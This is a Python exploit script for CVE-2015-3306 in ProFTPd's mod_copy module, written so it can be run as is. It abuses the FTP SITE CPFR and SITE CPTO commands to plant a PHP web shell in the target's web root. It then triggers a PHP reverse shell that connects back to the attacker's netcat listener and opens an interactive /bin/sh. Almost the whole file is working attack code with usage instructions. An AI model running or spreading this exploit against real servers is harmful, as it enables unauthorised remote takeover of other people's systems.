#!/usr/bin/env python

import socket
import sys
from urllib.parse import quote

import requests

# Exploit Title: ProFTPd 1.3.4 mod_copy RCE
# Date: 2019-11-26
# Exploit Author: TheGingerNinja
# Software: ProFTPd 1.3.5 with mod_copy
# Version: 1.3.4
# Tested on: Ubuntu 15.10
# CVE : 2015-3306
# Language : Python 3
#
# Non Metasploit exploit of CVE-2015-3306
# Follows pattern of: https://www.exploit-db.com/exploits/37262
#
# Usage:
#     python exploit_proftd_1_3_5.py RHOST SITEPATH LHOST LPORT
#
# RHOST:
#     IP of machine with ProFTP 1.3.5 running
#
# SITEPATH:
#     The http server home address is needed:
#     e.g. /var/www, /var/www/html
#
# LHOST:
#     Attacking machine IP with netcat listening
#     e.g 1.2.3.4
#
# LPORT:
#     Port that Netcat is listening on
#     e.g. 80


def check_response(soc, check_str, exit_message):
    ftp_response = soc.recv(1024)
    if check_str not in ftp_response:
        print("[-] " + exit_message)
        s.close()
        sys.exit()


# Check and gather command line args
if len(sys.argv) < 5:
    print("\nUsage: python " + sys.argv[0] + " <RHOST> <SITEPATH> <LHOST> <LPORT>\n")
    sys.exit()
rhost = sys.argv[1]
sitepath = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]

print("[+] REMINDER: Start a Netcat listener on port: " + lport)
print("[+] Running exploit for ProFTPd 1.3.5...")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 21))

ftp_banner = s.recv(1024)
print("[+] FTP Banner: " + str(ftp_banner))

print("[+] Sending exploit...")
s.send("SITE CPFR /proc/self/cmdline\r\n".encode())
check_response(s, "350".encode(), "Copy from /proc/self/cmdline failed!")

s.send("SITE CPTO /tmp/.<?php passthru($_GET['banana']);?>\r\n".encode())
check_response(s, "250".encode(), "Failed copy to temporary payload!")

s.send("SITE CPFR /tmp/.<?php passthru($_GET['banana']);?>\r\n".encode())
check_response(s, "350".encode(), "Failed copying from temporary payload!")

s.send("SITE CPTO ".encode() + sitepath.encode() + "/pealthe.php\r\n".encode())
check_response(s, "250".encode(), "Failed to copy PHP payload to website home path!")

payload = (
    "nohup php -r '$sock=fsockopen(\""
    + lhost
    + '",'
    + lport
    + ');exec("/bin/sh -i <&3 >&3 2>&3");\' & '
)
encoded_payload = quote(payload)

print(
    "[+] Running payload by requesting: http://"
    + rhost
    + "/pealthe.php?banana="
    + encoded_payload
)

requests.get("http://" + rhost + "/pealthe.php?banana=" + encoded_payload)

print("[+] Thank you for using this exploit. Now go bananas!")

s.close()